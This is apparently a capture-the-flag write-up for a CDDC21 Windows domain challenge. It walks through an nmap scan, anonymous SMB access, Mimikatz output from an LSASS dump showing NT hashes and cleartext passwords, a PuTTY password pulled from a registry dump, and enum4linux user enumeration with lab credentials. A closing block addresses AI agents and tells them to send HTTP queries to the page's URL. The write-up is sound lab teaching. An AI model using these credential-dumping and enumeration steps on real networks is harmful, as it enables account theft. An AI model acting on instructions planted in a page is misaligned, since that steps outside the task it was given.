# Behind the Mask (Windows) ## Hello Guest Port scan: ``` └─# nmap -sC -sV -v -Pn 54.255.213.169 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-24 02:10:15Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: GDC) 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: GDC | NetBIOS_Domain_Name: GDC | NetBIOS_Computer_Name: GDC-DC-J | DNS_Domain_Name: gdc.local | DNS_Computer_Name: GDC-DC-J.gdc.local | DNS_Tree_Name: gdc.local | Product_Version: 10.0.14393 |_ System_Time: 2021-06-24T02:10:15+00:00 | ssl-cert: Subject: commonName=GDC-DC-J.gdc.local | Issuer: commonName=GDC-DC-J.gdc.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-06-16T15:44:01 | Not valid after: 2021-12-16T15:44:01 | MD5: 4af0 4092 e460 3e66 22e0 bfd2 201d ab7a |_SHA-1: 7c57 5c74 5cc7 ea3e a9ee 0d19 159f 4638 6bcf b1ec |_ssl-date: 2021-06-24T02:10:55+00:00; 0s from scanner time. Service Info: Host: GDC-DC-J; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 0s, deviation: 1s, median: 0s | smb-os-discovery: | OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3) | Computer name: GDC-DC-J | NetBIOS computer name: GDC-DC-J\x00 | Domain name: gdc.local | Forest name: gdc.local | FQDN: GDC-DC-J.gdc.local |_ System time: 2021-06-24T02:10:18+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-06-24T02:10:19 |_ start_date: 2021-06-22T10:01:52 ``` ### **SMB Shares** ``` └─# smbclient -U '' -L \\\\54.255.213.169 Enter WORKGROUP\'s password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backup Disk C$ Disk Default share Forensics1 Disk Forensics2 Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Users Disk SMB1 disabled -- no workgroup available ``` Connect to Backup share with no username. `CDDC21{0LLHE_Gue$T}` ## Old Memories Credentials: `alexander.p:v#X1nOLqPZ` Access Forensics1 using these credentials. There is an LSASS dump, which we can use Mimikatz to interpret. This gives us the credentials `John:#johnIStheBEST!`. ``` == MSV == Username: Flag Domain: DESKTOP-2QFHHML LM: NA NT: 596c4994f88d93d0718bdea487092f11 SHA1: 45b9d6c67c871a7c763e3a062c8e0684415e6834 == WDIGEST [e0b3a]== username Flag domainname DESKTOP-2QFHHML password CDDC21{lsa$$_DUMP_password} == Kerberos == Username: Flag Domain: DESKTOP-2QFHHML Password: None == WDIGEST [e0b3a]== username Flag domainname DESKTOP-2QFHHML password CDDC21{lsa$$_DUMP_password} == DPAPI [e0b3a]== luid 920378 key_guid 9c3ff7d7-c6c0-4d8d-8c0d-7dc7428f80a1 masterkey 6e95c4172045ea74162063f33065449b683b612d2c52b8db502b8ece05311ff16e18b4a1d737e5fc93eb0882576bc17f85f2f70e0344b6db49600e9a461a2a8f sha1_masterkey 06cdbed57b14937ac2008d24a56a423f919a1eb7 == LogonSession == authentication_id 195058 (2f9f2) session_id 1 username John domainname DESKTOP-2QFHHML logon_server DESKTOP-2QFHHML logon_time 2021-06-10T06:44:43.890166+00:00 sid S-1-5-21-2198713953-2006436724-2838398043-1001 luid 195058 == MSV == Username: John Domain: DESKTOP-2QFHHML LM: NA NT: 53bb900f229aa32d546f54523a96de67 SHA1: 1075eeefce15aa2008f2e0594babccc09cdf5d4b == WDIGEST [2f9f2]== username John domainname DESKTOP-2QFHHML password #johnIStheBEST! == Kerberos == Username: John Domain: DESKTOP-2QFHHML Password: None == WDIGEST [2f9f2]== username John domainname DESKTOP-2QFHHML password #johnIStheBEST! == DPAPI [2f9f2]== luid 195058 key_guid 44b05868-2d03-4f04-a2ba-fedd6e3b08f5 masterkey 359eee0b2409c2d331ece3c70d71b8987d27a6ecf3e08848efeea3eda14c05a044f6efd3201a30cbd7e7c64fdcbb500453b22dd8cc322b2e0c3b0ff7b2850877 sha1_masterkey 68e0bf11f62251c47a0fa84869946e72224930f5 ``` Accessing Forensics2 as John gives us the flag. `CDDC21{lsa$$_DUMP_password}` ## Register We are given a registry dump. There is a PuTTy password stored in the registry. ``` [HKEY_USERS\S-1-5-21-2198713953-2006436724-2838398043-1001\SOFTWARE\SimonTatham\PuTTY\Sessions\flag] ... "ProxyPassword"="iS_Putty_s3cure?!" ... ``` The flag is `CDDC21{iS_Putty_s3cure?!}` ## Last Note Listing all the domain users, we find the flag in the description of `henry.s`. ``` └─$ enum4linux -u alexander.p -p "v#X1nOLqPZ" -U 54.255.213.169 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 24 00:22:40 2021 ========================== | Target Information | ========================== Target ........... 54.255.213.169 RID Range ........ 500-550,1000-1050 Username ......... 'alexander.p' Password ......... 'v#X1nOLqPZ' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ... =============================== | Users on 54.255.213.169 | =============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x10ab RID: 0x461 acb: 0x00000010 Account: adrian.c Name: Collins, Adrian Desc: Programer at GDC index: 0x10ae RID: 0x464 acb: 0x00000010 Account: alexander.p Name: Perry, Alexander Desc: Help Desk index: 0x10a9 RID: 0x45f acb: 0x00000010 Account: andy.g Name: Goode, Andrew Desc: Algorithms at GDC index: 0x10a8 RID: 0x45e acb: 0x00000010 Account: ci_admin Name: Admin, CI Desc: Continuous Integration Admin index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0xfbd RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x10a2 RID: 0x458 acb: 0x00000010 Account: henry.s Name: Stewart, Henry Desc: CDDC21{We!!_D0NE} index: 0x10a3 RID: 0x459 acb: 0x00000010 Account: jacob.c Name: Coleman, Jacob Desc: Customer Success Manager index: 0x10b3 RID: 0x468 acb: 0x00000210 Account: john Name: john Desc: (null) index: 0x10ac RID: 0x462 acb: 0x00000010 Account: john.m Name: Miller, John Desc: Programer at GDC index: 0x10aa RID: 0x460 acb: 0x00000010 Account: justin.t Name: Tuck, Justin Desc: Programer at GDC index: 0xff5 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x10a5 RID: 0x45b acb: 0x00000010 Account: marcus.w Name: Wright, Marcus Desc: Researcher at GDC index: 0xfbf RID: 0x3f0 acb: 0x00000210 Account: root Name: root Desc: (null) index: 0x10ad RID: 0x463 acb: 0x00000010 Account: ryan.b Name: Butler, Ryan Desc: Help Desk Manager index: 0x10a4 RID: 0x45a acb: 0x00000010 Account: serena.k Name: Kagan, Serena Desc: Researcher at GDC index: 0x10af RID: 0x465 acb: 0x00000010 Account: svc_admin Name: , SVC Desc: Service admin account index: 0x10a6 RID: 0x45c acb: 0x00000010 Account: thomas.p Name: Parnell, Thomas Desc: Researcher at GDC index: 0x10a7 RID: 0x45d acb: 0x00000010 Account: vick.c Name: Chamberlain, Vick Desc: Researcher at GDC ... ``` The flag is `CDDC21{We!!_D0NE}` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ctf.zeyu2001.com/2021/dsta-brainhack-cddc21/behind-the-mask-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.